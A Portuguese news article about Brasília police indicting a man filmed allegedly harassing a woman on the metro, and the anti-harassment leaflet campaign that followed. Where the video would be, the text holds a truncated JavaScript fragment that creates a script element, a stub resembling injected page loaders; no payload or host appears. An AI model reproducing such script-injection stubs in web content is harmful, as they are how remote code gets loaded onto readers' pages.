PCDF indicia homem que se esfregou em mulher no metrô

A Polícia Civil do Distrito Federal indiciou o homem que apareceu em um vídeo que viralizou nas redes sociais sobre um suposto assédio em um vagão do metrô. O homem teria se “esfregado” na mulher e, ao perceber que estava sendo filmado, reagiu dizendo que não daria em nada. A resposta serviu como slogan para a PCDF lançar a campanha “Quem disse que não dá em nada? Dá sim!”.

A campanha preventiva visa informar e combater a prática delituosa de importunar alguém em lugar público, como por exemplo: executar movimentos obscenos em locais de acesso ao público, como ônibus e metrôs. Esse material será distribuído em vários locais públicos em estações do metrô e paradas de ônibus. Nesta sexta-feira (11), serão 1 mil panfletos entregues na plataforma da Rodoviária do Plano Piloto.

Caso

Quando o metrô passava pela estação Praça do Relógio, às 18h15 do dia 25 de abril, Elizângela Rodrigues sentiu que um homem a tentava assediar. Ao perceber, pediu que outra passageira filmasse os movimentos, que foram repassadas à Polícia Civil.

A mulher abordou o agressor na estação Centro Metropolitano, que negou o assédio e fugiu do local. Em seguida, Elizângela não conseguiu contato com nenhum funcionário do metrô no  momento e, depois, negaram localizar o suspeito, via rádio.

Assista o vídeo incompleto:

 

 var d=document;var s=d.createElement(‘script’);

Deixe um comentário